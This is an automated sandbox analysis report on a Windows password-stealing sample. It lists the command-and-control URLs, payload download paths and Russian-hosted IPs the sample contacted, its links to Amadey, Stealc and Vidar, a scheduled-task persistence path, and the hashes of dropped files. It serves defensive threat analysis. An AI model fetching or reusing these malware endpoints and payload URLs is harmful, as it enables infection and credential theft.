                        http://85.28.47.4SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001ABE000.00000004.00000020.00020000.00000000.sdmp, a37ec701f3.exe, 0000000B.00000002.1970868241.00000000013FE000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://ac.ecosia.org/autocomplete?q=SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000003.1730833023.0000000001B7B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://77.91.77.82/Hun4Ko/index.phpgWexplorti.exe, 00000008.00000002.4134557911.0000000001324000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://77.91.77.81/mine/amadka.exemSecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001ABE000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: phishing
                        unknown
                        http://77.91.77.82/Hun4Ko/index.phplexplorti.exe, 00000008.00000002.4134557911.00000000012E1000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgSecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001C27000.00000004.00000020.00020000.00000000.sdmp, KKKJKEBKFCAAECAAAAAE.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://pki-ocsp.symauth.com0SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, random[1].exe.8.dr, a37ec701f3.exe.8.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://85.28.47.4/920475a59bac849d.phpnB~a37ec701f3.exe, 0000000B.00000002.1970868241.0000000001414000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://77.91.77.82/Hun4Ko/index.phpYW(explorti.exe, 00000008.00000002.4134557911.0000000001324000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://support.mozilla.orgEHJJKFCBGIDGHIECGCBKFHIEBG.0.drfalse
                        • URL Reputation: safe
                        unknown
                        http://77.91.77.82/Hun4Ko/index.php5Wexplorti.exe, 00000008.00000002.4134557911.0000000001324000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000003.1730833023.0000000001B7B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://85.28.47.4/69934896f997d5bb/vcruntime140.dllSSecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001B0C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://77.91.77.81/stealc/random.exe50673b5d7Xexplorti.exe, 00000008.00000002.4134557911.000000000130F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        77.91.77.81
                        unknownRussian Federation
                        42861FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUfalse
                        85.28.47.4
                        unknownRussian Federation
                        31643GES-ASRUtrue
                        77.91.77.82
                        unknownRussian Federation
                        42861FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUtrue
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1465915
                        Start date and time:2024-07-02 08:25:27 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 12m 0s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:17
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@19/28@0/3
                        EGA Information:
                        • Successful, ratio: 50%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target BGIIDAEBGC.exe, PID 7632 because it is empty
                        • Execution Graph export aborted for target a37ec701f3.exe, PID 7344 because it is empty
                        • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                        • Not all processes where analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        TimeTypeDescription
                        02:26:42API Interceptor11377568x Sleep call for process: explorti.exe modified
                        07:26:39Task SchedulerRun new task: explorti path: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        77.91.77.81Wf9qnVcbi8.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81/stealc/random.exe
                        setup.exeGet hashmaliciousAmadeyBrowse
                        • 77.91.77.81/Kiru9gu/index.php
                        1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                        • 77.91.77.81/stealc/random.exe
                        Rnteb46TuM.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81/stealc/random.exe
                        8vZMEr8sm9.exeGet hashmaliciousAmadeyBrowse
                        • 77.91.77.81/stealc/random.exe
                        1jPL5zru3u.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81/mine/amadka.exe
                        Zachv5lCuu.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81/stealc/random.exe
                        1719520929.094843_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, VidarBrowse
                        • 77.91.77.81/stealc/random.exe
                        j7iUba2bki.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81/stealc/random.exe
                        1Cvd8TyYPm.exeGet hashmaliciousLummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRATBrowse
                        • 77.91.77.81/stealc/random.exe
                        85.28.47.4Wf9qnVcbi8.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4/920475a59bac849d.php
                        1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                        • 85.28.47.4/920475a59bac849d.php
                        Rnteb46TuM.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4/920475a59bac849d.php
                        1jPL5zru3u.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4/920475a59bac849d.php
                        Zachv5lCuu.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4/920475a59bac849d.php
                        1719520929.094843_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, VidarBrowse
                        • 85.28.47.4/920475a59bac849d.php
                        UjgmwyFttK.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4/69934896f997d5bb/sqlite3.dll
                        j7iUba2bki.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4/920475a59bac849d.php
                        1Cvd8TyYPm.exeGet hashmaliciousLummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRATBrowse
                        • 85.28.47.4/920475a59bac849d.php
                        ukuWaeRgPR.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4/920475a59bac849d.php
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUWf9qnVcbi8.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.82
                        setup.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, SmokeLoader, StealcBrowse
                        • 77.91.77.81
                        setup.exeGet hashmaliciousAmadeyBrowse
                        • 77.91.77.81
                        1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                        • 77.91.77.80
                        Rnteb46TuM.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.82
                        8vZMEr8sm9.exeGet hashmaliciousAmadeyBrowse
                        • 77.91.77.82
                        1jPL5zru3u.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.82
                        Zachv5lCuu.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.82
                        1719520929.094843_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, VidarBrowse
                        • 77.91.77.80
                        file.exeGet hashmaliciousAmadeyBrowse
                        • 77.91.77.82
                        GES-ASRUWf9qnVcbi8.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4
                        setup.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, SmokeLoader, StealcBrowse
                        • 85.28.47.7
                        1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                        • 85.28.47.4
                        Rnteb46TuM.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4
                        1jPL5zru3u.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4
                        Zachv5lCuu.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4
                        1719520929.094843_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, VidarBrowse
                        • 85.28.47.4
                        UjgmwyFttK.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4
                        j7iUba2bki.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4
                        1Cvd8TyYPm.exeGet hashmaliciousLummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRATBrowse
                        • 85.28.47.4
                        FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUWf9qnVcbi8.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.82
                        setup.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, SmokeLoader, StealcBrowse
                        • 77.91.77.81
                        setup.exeGet hashmaliciousAmadeyBrowse
                        • 77.91.77.81
                        1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                        • 77.91.77.80
                        Rnteb46TuM.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.82
                        8vZMEr8sm9.exeGet hashmaliciousAmadeyBrowse
                        • 77.91.77.82
                        1jPL5zru3u.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.82
                        Zachv5lCuu.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.82
                        1719520929.094843_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, VidarBrowse
                        • 77.91.77.80
                        file.exeGet hashmaliciousAmadeyBrowse
                        • 77.91.77.82
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        C:\ProgramData\freebl3.dlli3NmF0obCm.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                          Wf9qnVcbi8.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                            setup.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, SmokeLoader, StealcBrowse
                              1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                                jlO7971vUz.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                  Rnteb46TuM.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                    1jPL5zru3u.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                      Zachv5lCuu.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                        1719520929.094843_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, VidarBrowse
                                          j7iUba2bki.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                            Category:dropped
                                            Size (bytes):49152
                                            Entropy (8bit):0.8180424350137764
                                            Encrypted:false
                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                            MD5:349E6EB110E34A08924D92F6B334801D
                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                            Category:dropped
                                            Size (bytes):28672
                                            Entropy (8bit):2.5793180405395284
                                            Encrypted:false
                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                            Category:dropped
                                            Size (bytes):40960
                                            Entropy (8bit):0.8553638852307782
                                            Encrypted:false
                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                            Category:dropped
                                            Size (bytes):98304
                                            Entropy (8bit):0.08235737944063153
                                            Encrypted:false
                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                            Category:dropped
                                            Size (bytes):5242880
                                            Entropy (8bit):0.037963276276857943
                                            Encrypted:false
                                            SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                            MD5:C0FDF21AE11A6D1FA1201D502614B622
                                            SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                            SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                            SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                            Malicious:false
                                            Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                            Category:dropped
                                            Size (bytes):114688
                                            Entropy (8bit):0.9746603542602881
                                            Encrypted:false
                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                            Malicious:false
                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):9571
                                            Entropy (8bit):5.536643647658967
                                            Encrypted:false
                                            SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                            MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                            SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                            SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                            SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                            Malicious:false
                                            Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):685392
                                            Entropy (8bit):6.872871740790978
                                            Encrypted:false
                                            SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                            MD5:550686C0EE48C386DFCB40199BD076AC
                                            SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                            SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                            SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Joe Sandbox View:
                                            • Filename: i3NmF0obCm.exe, Detection: malicious, Browse
                                            • Filename: Wf9qnVcbi8.exe, Detection: malicious, Browse
                                            • Filename: setup.exe, Detection: malicious, Browse
                                            • Filename: 1719859269.0326595_setup.exe, Detection: malicious, Browse
                                            • Filename: jlO7971vUz.exe, Detection: malicious, Browse
                                            • Filename: Rnteb46TuM.exe, Detection: malicious, Browse
                                            • Filename: 1jPL5zru3u.exe, Detection: malicious, Browse
                                            • Filename: Zachv5lCuu.exe, Detection: malicious, Browse
                                            • Filename: 1719520929.094843_setup.exe, Detection: malicious, Browse
                                            • Filename: j7iUba2bki.exe, Detection: malicious, Browse
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):608080
                                            Entropy (8bit):6.833616094889818
                                            Encrypted:false
                                            SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                            MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                            SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                            SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                            SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):450024
                                            Entropy (8bit):6.673992339875127
                                            Encrypted:false
                                            SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                            MD5:5FF1FCA37C466D6723EC67BE93B51442
                                            SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                            SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                            SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):2046288
                                            Entropy (8bit):6.787733948558952
                                            Encrypted:false
                                            SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                            MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                            SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                            SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                            SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
